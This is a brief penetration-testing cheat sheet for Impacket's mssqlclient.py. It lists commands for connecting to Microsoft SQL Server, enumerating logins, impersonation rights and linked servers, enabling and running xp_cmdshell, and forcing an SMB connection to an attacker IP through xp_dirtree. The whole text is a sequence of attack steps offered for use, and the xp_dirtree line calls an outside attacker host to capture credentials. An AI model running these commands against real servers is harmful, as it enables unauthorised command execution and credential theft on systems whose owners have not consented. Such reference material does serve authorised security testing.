#
mssqlclient.py
Great for enumerating/attacking SQL server. This article was very helpful in putting together this cheat sheet.
#
Basic command to connect to a SQL server
mssqlclient.py user@host -port 123
#
Connect to SQL server with a domain account and non-standard port
mssqlclient.py domain.com/user@sql1.domain.com -p 123 -windows-auth
#
Enum logins
enum_logins
#
Enumerate impersonation values
enum_impersonate
#
Enumerate linked SQL servers
enum_links
#
Enable XP_CMDSHELL
enable_xp_cmdshell
#
Run command using XP_CMDSHELL
xp_cmdshell whoami
#
Coerce an SMB connection to an attacker system using XP_DIRTREEE
EXEC xp_dirtree '\\YOUR.ATTACKING.IP.ADDRESS\doesntmatter';